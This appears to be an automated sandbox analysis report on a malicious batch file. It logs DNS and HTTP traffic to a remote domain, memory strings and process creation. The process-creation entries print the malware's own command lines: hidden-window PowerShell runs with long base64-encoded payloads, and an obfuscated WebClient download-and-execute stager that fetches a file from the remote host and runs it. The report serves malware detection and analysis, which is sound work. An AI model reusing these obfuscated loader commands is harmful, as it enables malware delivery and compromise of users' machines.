Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt HTTP/1.1Host: qqcxq1.dyheg.funConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: qqcxq1.dyheg.fun
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Apr 2025 19:59:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 193Connection: closeX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffCf-Cache-Status: DYNAMICServer: cloudflareSet-Cookie: connect.sid=s%3AAvjgGrOay8d4iXYwUutebVYKUNI1fQVA.sjFiGZhpzt5Xj0xJqWxuSMo3dzAabzbphFz8KylaUPM; HttpOnly; Path=/CF-RAY: 933f76977c2d438d-EWRalt-svc: h3=":443"; ma=86400
Source: powershell.exe, 00000002.00000002.65046945667.00000290FAA12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.65006888870.000001864A5DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64974512754.0000000002BB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000002.00000002.65046945667.00000290FAA12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.65006888870.000001864A5DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64974512754.0000000002BB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.64957011856.0000018635196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64998067547.00000186425D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64998067547.0000018642753000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.65007842916.0000000005BCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.64957011856.000001863501D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: powershell.exe, 00000004.00000002.64957011856.00000186326AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000004.00000002.64957011856.0000018635049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64957011856.000001863501D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngh
Source: powershell.exe, 00000002.00000002.65025026617.0000029080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64957011856.0000018632471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64978795934.0000000004B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.64957011856.0000018634C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000002.64957011856.000001863501D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: powershell.exe, 00000004.00000002.64957011856.00000186326AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000004.00000002.64957011856.0000018635049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64957011856.000001863501D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
Source: powershell.exe, 00000002.00000002.65046945667.00000290FAA12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.65006888870.000001864A5DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64974512754.0000000002BB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000002.00000002.65025026617.0000029080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64957011856.0000018632471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.64978795934.0000000004B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000005.00000002.65007842916.0000000005BCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.65007842916.0000000005BCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.65007842916.0000000005BCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.64957011856.000001863501D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
Source: powershell.exe, 00000004.00000002.64957011856.00000186326AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000004.00000002.64957011856.0000018635049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64957011856.000001863501D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pesterh
Source: powershell.exe, 00000004.00000002.64957011856.000001863375E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.64957011856.0000018635196000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64998067547.00000186425D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64998067547.0000018642753000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64978795934.00000000053EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.65007842916.0000000005BCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.65046945667.00000290FAA12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.65006888870.000001864A5DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.64974512754.0000000002BB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000004.00000002.64957011856.0000018634C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000004.00000002.64957011856.0000018633C55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.64957011856.00000186326AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qqcxq1.dyh
Source: powershell.exe, 00000005.00000002.64978795934.0000000004CB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qqcxq1.dyheg.fun
Source: powershell.exe, 00000004.00000002.64957011856.0000018633C55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qqcxq1.dyheg.fun/7721
Source: powershell.exe, 00000005.00000002.65025060540.0000000008805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca
Source: PowerShell_transcript.CLIENT-OF9976.acrVPW9E.20250421155938.txt.5.drString found in binary or memory: https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownHTTPS traffic detected: 172.67.212.124:443 -> 192.168.11.20:49747 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFC39152A1D4_2_00007FFC39152A1D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_06BA1D005_2_06BA1D00
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 27109
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 27092
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 27109Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 27092Jump to behavior
Source: classification engineClassification label: mal60.evad.winBAT@9/10@1/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20250421Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1608:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1608:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1gbqddpw.cai.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\malicious.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\malicious.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 powershell -w h -e ZgB1AG4AYwB0AGkAbwBuACAAYgBEAFgAdgBWACgAJABrAEMAcgBiAHgAKQAgAHsAcgBlAHQAdQByAG4AIABbAGMAaABhAHIAXQA6ADoAQwBvAG4AdgBlAHIAdABGAHIAbwBtAFUAdABmADMAMgAoACQAawBDAHIAYgB4ACkAfQAmACgAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADgAKQApACkAKAAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -e ZgB1AG4AYwB0AGkAbwBuACAAYgBEAFgAdgBWACgAJABrAEMAcgBiAHgAKQAgAHsAcgBlAHQAdQByAG4AIABbAGMAaABhAHIAXQA6ADoAQwBvAG4AdgBlAHIAdABGAHIAbwBtAFUAdABmADMAMgAoACQAawBDAHIAYgB4ACkAfQAmACgAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADgAKQApACkAKAAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYwApACkAKwAoAGIARA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -C Set-Item Variable:7kM 'https://qqcxq1.dyheg.fun/7721972eb8e100d6923d14a4173e8f144785818bbaeca7b9.accdt';SI Variable:\C ([Net.WebClient]::New());Set-Variable 3h (((([Net.WebClient]::New()|Member)|Where{(Variable _ -ValueOn).Name -like'D*g'}).Name));(Variable C -Value).((Variable 3h -ValueOnl))((Item Variable:\7kM).Value)|&(GV *uti*t).Value.InvokeCommand.(((GV *uti*t).Value.InvokeCommand.PsObject.Methods|Where{(Variable _ -ValueOn).Name -like'*Co*d'}).Name)((GV *uti*t).Value.InvokeCommand.GetCommandName('*e-Ex*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 powershell -w h -e ZgB1AG4AYwB0AGkAbwBuACAAYgBEAFgAdgBWACgAJABrAEMAcgBiAHgAKQAgAHsAcgBlAHQAdQByAG4AIABbAGMAaABhAHIAXQA6ADoAQwBvAG4AdgBlAHIAdABGAHIAbwBtAFUAdABmADMAMgAoACQAawBDAHIAYgB4ACkAfQAmACgAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADgAKQApACkAKAAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwBhACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABlACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADQANAApACkAKwAoAGIARABYAHYAVgAoADAAeAA0ADkAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANABmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUANwApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADQAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBmACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcANwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADcAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA4ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADUAYwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMwAxACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZQApACkAKwAoAGIARABYAHYAVgAoADAAeAAzADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANQBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2AGYAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA3ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAzACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAOAApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADUAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgBjACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAYJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -e ZgB1AG4AYwB0AGkAbwBuACAAYgBEAFgAdgBWACgAJABrAEMAcgBiAHgAKQAgAHsAcgBlAHQAdQByAG4AIABbAGMAaABhAHIAXQA6ADoAQwBvAG4AdgBlAHIAdABGAHIAbwBtAFUAdABmADMAMgAoACQAawBDAHIAYgB4ACkAfQAmACgAKABiAEQAWAB2AFYAKAAwAHgANgA5ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYANQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADgAKQApACkAKAAoAGIARABYAHYAVgAoADAAeAA1ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAMQApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADIAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwA0ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAZAApACkAKwAoAGIARABYAHYAVgAoADAAeAA1ADAAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANwAyACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADYAZgApACkAKwAoAGIARABYAHYAVgAoADAAeAA2ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgANgA1ACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADcAMwApACkAKwAoAGIARABYAHYAVgAoADAAeAA3ADMAKQApACsAKABiAEQAWAB2AFYAKAAwAHgAMgAwACkAKQArACgAYgBEAFgAdgBWACgAMAB4ADIAMgApACkAKwAoAGIARABYAHYAVgAoADAAeAAyAD